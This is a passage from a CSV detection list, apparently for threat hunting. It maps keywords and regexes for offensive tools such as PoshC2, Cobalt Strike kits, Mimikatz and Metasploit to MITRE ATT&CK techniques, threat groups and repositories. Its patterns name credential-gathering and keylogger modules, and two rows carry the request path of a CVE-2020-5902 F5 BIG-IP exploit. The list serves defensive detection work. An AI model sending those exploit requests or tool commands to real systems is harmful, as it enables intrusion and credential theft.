APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*portscan386 *",".{0,1000}portscan386\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*portscan64 *",".{0,1000}portscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*PortScan-Alive*",".{0,1000}PortScan\-Alive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portscanner.js*",".{0,1000}portscanner\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*portscanner.py*",".{0,1000}portscanner\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Portscan-Port*",".{0,1000}Portscan\-Port.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PortSwigger/http-request-smuggler*",".{0,1000}PortSwigger\/http\-request\-smuggler.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*posh_in_mem*",".{0,1000}posh_in_mem.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*posh_stageless.py*",".{0,1000}posh_stageless\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Posh_v4_dropper_*",".{0,1000}Posh_v4_dropper_.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Posh_v4_x64_*.bin*",".{0,1000}Posh_v4_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Posh_v4_x86_*.bin*",".{0,1000}Posh_v4_x86_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*PoshC2-*.zip*",".{0,1000}PoshC2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2.server*",".{0,1000}poshc2\.server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2.service*",".{0,1000}poshc2\.service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2-ansible-main.yml*",".{0,1000}poshc2\-ansible\-main\.yml.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-cookie-decryptor*",".{0,1000}posh\-cookie\-decryptor.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-delete *",".{0,1000}posh\-delete\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshkatz.psd1*",".{0,1000}poshkatz\.psd1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" "*posh-project *",".{0,1000}posh\-project\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-project -*",".{0,1000}posh\-project\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-update *",".{0,1000}posh\-update\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*",".{0,1000}POST\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileSave\.jsp.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*",".{0,1000}POST\s.{0,1000}fileName\=\/tmp\/1\.txt\&content\=CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*post/windows/gather*",".{0,1000}post\/windows\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*post/windows/gather/credentials/vnc*",".{0,1000}post\/windows\/gather\/credentials\/vnc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*post_breach_handler.py*",".{0,1000}post_breach_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*post_ex_amsi_disable*",".{0,1000}post_ex_amsi_disable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_keylogger*",".{0,1000}post_ex_keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_obfuscate*",".{0,1000}post_ex_obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Post_EX_Process_Name*",".{0,1000}Post_EX_Process_Name.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a 